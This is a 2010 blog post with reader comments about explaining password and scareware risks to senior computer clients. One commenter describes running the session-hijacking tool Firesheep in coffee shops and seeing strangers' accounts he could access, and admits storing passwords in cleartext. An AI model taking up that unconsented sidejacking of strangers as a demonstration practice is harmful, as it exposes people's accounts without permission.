Sherm's Senior Service

What to Tell Clients About Security

Posted by on Dec 27, 2010 | 3 Comments

Here is a puzzle presented to me by a senior client. She was bothered by the necessity of logging on to Gmail. She wanted to simply open her browser and have immediate access to her mail. She had seen me do just that and wondered how to do it.

That got me thinking about the general concern of security for various sites that require a user to log in with a password and userID. Browsers will kindly offer to remember the site for you to facilitate logging on, but that is an obvious security hazard. Even displaying the asterisks could be a hazard since an intruder could count the characters and maybe guess they represent a date or similar.

How concerned should we be? On one hand, we can accept the concept that there is no privacy on the Internet, but we want to buy things online and not have our bank account or credit card raided.

What is privacy? Persons being interviewed for a job are now routinely asked to discuss their Facebook page as part of the process. This can surprise someone who thought what was posted there is separate from other concerns.

What is security? The day before Christmas, I almost got an unexpected present from scareware. While searching for a manual for my wife’s Timex watch, a popup window announced that AV8 had just found some suspicious activity. All I had to do was to click here and they would fix it. There is no AV8 installed on that computer. If this ever happens to you, do not click on the X button to close the offender. Either immediately reboot or use the task manager to close it.

The point is that in this type of attack, security resides in knowledge, not software — well, maybe some software could prevent damage, but think of it as a series of barriers the bad guys must get through to harm your computer. Knowledge is the first barrier. Also, this last attack did not come from an obviously questionable site — it was not associated with either porn or piracy.

So what is your comfort level on passwords, userIDs, anti-malware techniques and software? Would you suggest different procedures for less well-versed clients?

  • http://visuex.com Michael Tunnell

    I have auto-generated passwords so all of my passwords are different for every site and a random numbers, letters and symbols. So knowing me would basically do nothing for someone trying to guess my passwords.

    However, in my opinion if someone gets physical access to my computer then security basically means nothing because when that happens the person pretty much has full reign.

    So keeping your passwords in your browser or in a service like LastPass isnt an issue as long as you keep them different and keep your computer up to date.

    For clients though it is hard to explain to them most of that and I pretty much do my best and test the waters to what they are willing to do…that is about all you can do because even with trying to explain stuff it could just be a lost cause when they refuse to do it.

  • spookie

    I disagree with Michael that physical access necessarily means a person has free reign. I say necessarily because, while I am utterly familiar with security on my computers, Mac, Windows and Linux, I don’t always do what I know I should. I use secure passwords. I don’t save passwords, allow only session cookies, and dump all caches, cookies and history when I close my browser. I even specifically use ssl at every site I can–I even use Encrypted Google. But remembering all those secure passwords? Not so much. Unfortunately that means saving the passwords in a cleartext file on the drive. (I know, I know!) So, while having physical access to my computer would give one access, but only because I’m stupid. If I encrypted that password file, or kept it separate from the computer…

    My concern with auto-logging in is that it opens up all those accounts when using unencrypted wifi. I have run Firesheep in several coffee shops, just to see how big a problem this is, and I have seen people who who had 8 or more accounts I could access. Now, I doubt they were actively accessing all those sites. They were just auto-logged on.

    How do I explain this? Well, if possible, these days I show them. Among other things, Firesheep makes a h&11 of an impression.

  • spookie

    BTW, how lazy do you have to be to find logging in to gmail bothersome? I guess if logging in was an issue for her, I’d set her up with an email client.